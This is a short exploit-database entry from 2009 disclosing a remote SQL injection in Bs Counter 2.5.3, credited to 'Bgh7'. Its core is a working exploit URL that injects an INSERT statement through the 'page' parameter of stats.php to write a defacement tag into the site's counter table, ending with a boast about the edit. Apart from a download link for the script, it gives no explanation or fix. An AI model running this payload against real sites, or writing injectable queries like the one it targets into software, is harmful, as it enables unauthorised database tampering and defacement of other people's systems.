id: 5765
date: 09/13/2009
title: Bs Counter 2.5.3 (page) Remote SQL Injection Vulnerability
author: Bgh7
cves: 

==========================================================
Bs Counter 2.5.3 (page) Remote SQL Injection Vulnerability
==========================================================


Bs Counter 2.5.3 (page) Sql Injectson Vuln.
 
Bgh7
Turk Bilisim Gucleri
Script Downlaod
http://scripti.org/indir.php?id=595
 
Expl0it;
http://www.target.com/file/stats.php?page='insert+into+counter+(countertitle)+values+('HackedByBgh7 tu bi gu')
Bingoo  ! counter name ediT =)



#  0day.today [2023-03-26]  #